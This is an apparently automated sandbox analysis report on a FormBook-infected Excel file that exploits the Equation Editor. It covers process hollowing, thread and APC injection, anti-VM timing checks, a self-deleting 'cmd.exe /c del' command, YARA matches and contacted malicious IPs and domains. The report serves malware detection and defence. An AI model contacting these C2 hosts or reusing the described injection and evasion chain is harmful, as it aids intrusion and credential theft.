          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982F0 NtClose,7_2_000982F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009817A NtCreateFile,7_2_0009817A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981BA NtCreateFile,7_2_000981BA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009826A NtReadFile,7_2_0009826A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E4632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_01E4632E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_01E467C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E46332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_01E46332
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_01E467C2 NtQueryInformationProcess,7_2_01E467C2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486
          Source: QTN3C2AF414EDF9_041873.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Both rules matched each of the following sources:
          Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@9/12@8/6
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404763
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F4225 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,4_2_722F4225
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,4_2_0040216B
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBB.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxVirustotal: Detection: 33%
          Source: QTN3C2AF414EDF9_041873.xlsxReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: QTN3C2AF414EDF9_041873.xlsxStatic file information: File size 2421248 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000002.2205835901.00000000004F9000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators vbamacros = False
          Source: QTN3C2AF414EDF9_041873.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\Public\vbc.exeUnpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_72E31A98
          Source: z9ayiyo.dll.4.drStatic PE information: section name: .code
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E32F60 push eax; ret 4_2_72E32F8E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004160D8 push ebp; ret 5_2_004160E6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C96C push cs; ret 5_2_0041C96D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C40D push esi; iretd 5_2_0041C40F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C485 push FFFFFFC3h; retf 5_2_0041C48D
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00415CA3 push edx; retf 5_2_00415CB3
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CFC1 pushfd ; retf 5_2_0041CFC8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004187D8 push ss; ret 5_2_004187DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008DDFA1 push ecx; ret 5_2_008DDFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004160D8 push ebp; ret 5_1_004160E6
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B3B5 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B46C push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B402 push eax; ret 5_1_0041B408
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041B40B push eax; ret 5_1_0041B472
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C40D push esi; iretd 5_1_0041C40F
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C485 push FFFFFFC3h; retf 5_1_0041C48D
          Source: C:\Users\Public\vbc.exeCode function: 5_1_004187D8 push ss; ret 5_1_004187DB
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041C96C push cs; ret 5_1_0041C96D
          Source: C:\Users\Public\vbc.exeCode function: 5_1_00415CA3 push edx; retf 5_1_00415CB3
          Source: C:\Users\Public\vbc.exeCode function: 5_1_0041CFC1 pushfd ; retf 5_1_0041CFC8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020BDFA1 push ecx; ret 7_2_020BDFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000960D8 push ebp; ret 7_2_000960E6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B3B5 push eax; ret 7_2_0009B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B40B push eax; ret 7_2_0009B472
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009C40D push esi; iretd 7_2_0009C40F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B402 push eax; ret 7_2_0009B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0009B46C push eax; ret 7_2_0009B472
          Source: initial sampleStatic PE information: section name: .data entropy: 7.7471273442

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: QTN3C2AF414EDF9_041873.xlsxStream path 'EncryptedPackage' entropy: 7.99993012299 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008897E second address: 0000000000088984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2792Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1616Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405A15
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004065C1 FindFirstFileA,FindClose,4_2_004065C1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004027A1 FindFirstFileA,4_2_004027A1
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2183466751.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2183431407.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2165759515.000000000058D000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2168570646.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_72E31A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,4_2_72E31A98
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F478F mov eax, dword ptr fs:[00000030h]4_2_722F478F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_722F458C mov eax, dword ptr fs:[00000030h]4_2_722F458C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C0080 mov ecx, dword ptr fs:[00000030h]5_2_008C0080
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008C00EA mov eax, dword ptr fs:[00000030h]5_2_008C00EA
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008E26F8 mov eax, dword ptr fs:[00000030h]5_2_008E26F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_020C26F8 mov eax, dword ptr fs:[00000030h]7_2_020C26F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.251.44.218 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 191.96.163.202 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.57.196.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.61.250 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 1A0000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2168448795.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.2375979053.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403486

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2900000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Spearphishing Link 1 | Native API 1 | Path Interception | Access Token Manipulation 1 | Masquerading 121 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Process Injection 512 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 15 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution 13 | Logon Script (Windows) | Logon Script (Windows) | Access Token Manipulation 1 | Security Account Manager | Process Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 41 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 12 | DCSync | System Information Discovery 14 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

          Behavior Graph

          [Behavior graph, ID 356571. Sample: QTN3C2AF414EDF9_041873.xlsx; start date: 23/02/2021; architecture: WINDOWS; score: 100. Process chain shown: EQNEDT32.EXE started vbc.exe, which started a second vbc.exe; that process injected into explorer.exe, which started ipconfig.exe, which started cmd.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label | Link
          QTN3C2AF414EDF9_041873.xlsx | 33% | Virustotal | | Browse
          QTN3C2AF414EDF9_041873.xlsx | 26% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882 |

          Dropped Files

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | 100% | Joe Sandbox ML | |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1] | 36% | ReversingLabs | Win32.Backdoor.Androm |
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll | 0% | Metadefender | | Browse
          C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll | 0% | ReversingLabs | |
          C:\Users\Public\vbc.exe | 36% | ReversingLabs | Win32.Backdoor.Androm |

          Unpacked PE Files

          Source | Detection | Scanner | Label | Link | Download
          5.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          4.2.vbc.exe.2900000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          ow.ly | 54.67.57.56 | true | false | | high
          algreenstdykeghestqw.dns.army | 103.140.251.164 | true | false | | unknown
          overseaexpert.com | 191.96.163.202 | true | true | | unknown
          athara-kiano.com | 103.251.44.218 | true | true | | unknown
